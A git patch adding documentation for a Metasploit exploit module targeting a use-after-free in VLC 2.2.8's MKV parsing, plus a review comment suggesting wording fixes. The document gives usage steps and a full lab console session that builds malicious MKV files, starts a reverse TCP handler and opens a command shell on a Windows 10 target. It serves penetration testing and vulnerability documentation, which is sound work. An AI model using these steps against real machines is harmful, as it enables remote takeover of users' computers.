From 6544c6636ca598164b3c02f0912dff79b6796d0a Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Wed, 10 Oct 2018 12:23:52 -0500 Subject: [PATCH] Add documentation --- .../exploit/windows/fileformat/vlc_mkv.md | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 documentation/modules/exploit/windows/fileformat/vlc_mkv.md diff --git a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md new file mode 100644 index 0000000000..25e306b25e --- /dev/null +++ b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md 
@@ -0,0 +1,51 @@ +## Description + +VideoLAN VLC <= v2.2.8 (32 and 64 bit) are vulnerable to a use-after-free vulnerability that exists in the parsing of MKV files. + +This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Windows 10 Pro x64. + +## Vulnerable Application + +[VLC](https://get.videolan.org/vlc/) <= v2.2.8 + +## Verification Steps + +- `./msfconsole -q` +- `use exploit/windows/fileformat/vlc_mkv` +- `run` +- Start handler +- Copy over mkv files to target hosts and open part1 in VLC +- Set a shell + +## Scenarios + +### Windows 10 x64 running VLC 2.2.8 (x64) + +``` +msf5 > use exploit/windows/fileformat/vlc_mkv +msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 +lhost => 172.22.222.134 +msf5 exploit(windows/fileformat/vlc_mkv) > run + +[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv +[*] Created tjub-part1.mkv. Target should open this file +[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv +[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv +[*] Appending blocks to tjub-part1.mkv +[+] Succesfully appended blocks to tjub-part1.mkv +msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444 +[*] Payload handler running as background job 0. +msf5 exploit(windows/fileformat/vlc_mkv) > +[*] Started reverse TCP handler on 172.22.222.134:4444 +[*] Sending stage (336 bytes) to 172.22.222.200 +[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500 +sessions -i 2 +[*] Starting interaction with 2... + +systeminfo +systeminfo + +Host Name: DESKTOP-IPOGIJR +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.17134 N/A Build 17134 +```
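Review bot: the Verification Steps leave out a requirement that the module's own output states, namely that `tjub-part2.mkv` must be placed in the same directory as `tjub-part1.mkv` on the target; the step `- Copy over mkv files to target hosts and open part1 in VLC` should say both files are copied into the same directory before part1 is opened, and `- Set a shell` should read `- Get a shell`. The step `- Start handler` gives no payload or port, while the Scenarios block shows the exact invocation `handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444` for the x64 build, so quoting that line (and noting that the payload has to match the 32- or 64-bit VLC build being tested) would make the procedure reproducible. In the Description, `VideoLAN VLC <= v2.2.8 (32 and 64 bit) are vulnerable to a use-after-free vulnerability that exists in the parsing of MKV files.` reads better as `VideoLAN VLC <= v2.2.8 (32 and 64 bit) is vulnerable to a use-after-free in its MKV parser.` The file has no References section; if the module declares an advisory reference, it should be listed here. The `Succesfully` in the captured output is a typo in the module's status string rather than in this document and belongs in a separate fix to the module.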